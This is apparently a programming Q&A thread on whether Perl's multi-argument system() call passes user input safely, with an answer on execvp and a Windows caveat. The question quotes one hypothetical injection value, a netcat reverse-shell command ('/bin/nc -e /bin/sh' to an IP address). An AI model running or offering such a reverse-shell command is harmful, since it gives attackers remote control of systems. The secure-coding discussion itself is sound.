# Avoiding code injection in system perl function

Tags: perl

`system()` is a function that executes a file with args 'n', meaning 'n' a real number.

If we have: `system("path/to/program","firstArg","secondArg",...);` the string inside the second argument will be always a string passed to `"path/to/program"` right?

If I do like: `system("path/to/program","legitArg",$userinput);` - does `$userinput` be vulnerable to code injection? Or it will be passed as string to `path/to/program`?
Even if `$userinput="some_kind_of_escape /bin/nc -e /bin/sh 10.0.0.1 1234"` ?

If not how can I parametrise such arguments?

**update**:based on answer below I found this from stanford: [using the perl system() function](http://gssg-www.stanford.edu/public/systemfunction.html)

Answer (score 7, accepted):

That's (almost) correct usage to avoid shell injection, since Perl will use `execvp` to directly execute the given program, without passing the arguments through a command shell.

From `perldoc system`:

> If there is more than one argument in LIST, or if
>               LIST is an array with more than one value, starts the program
>               given by the first element of the list with arguments given by the
>               rest of the list. If there is only one scalar argument, the
>               argument is checked for shell metacharacters, and if there are
>               any, the entire argument is passed to the system's command shell
>               for parsing (this is "/bin/sh -c" on Unix platforms, but varies on
>               other platforms). If there are no shell metacharacters in the
>               argument, it is split into words and passed directly to "execvp",
>               which is more efficient. On Windows, only the "system PROGRAM
>               LIST" syntax will reliably avoid using the shell; "system LIST",
>               even with more than one element, will fall back to the shell if
>               the first spawn fails.

Note the caveat about `system LIST` vs `system PROGRAM LIST` on Windows systems, so if your code is going to run there you should use:

```
system {"path/to/program"} "program-name", "legitArg", $userInput;
```

Nothing will protect you, of course, if the program that's being executed takes that user-supplied argument and passes it on to a shell itself.

Comment: No comma between PROGRAM and LIST.

Comment: @choroba thanks - fixed (although being Perl, it seems to work anyway).  I actually wan't aware of the Windows quirk that makes `system(@a)` potentially unsafe before researching this.

Comment: It's not question of safety. Perl will properly build the shell command. It's a question of process management, and whether `dir` (a shell command) will be executable or not.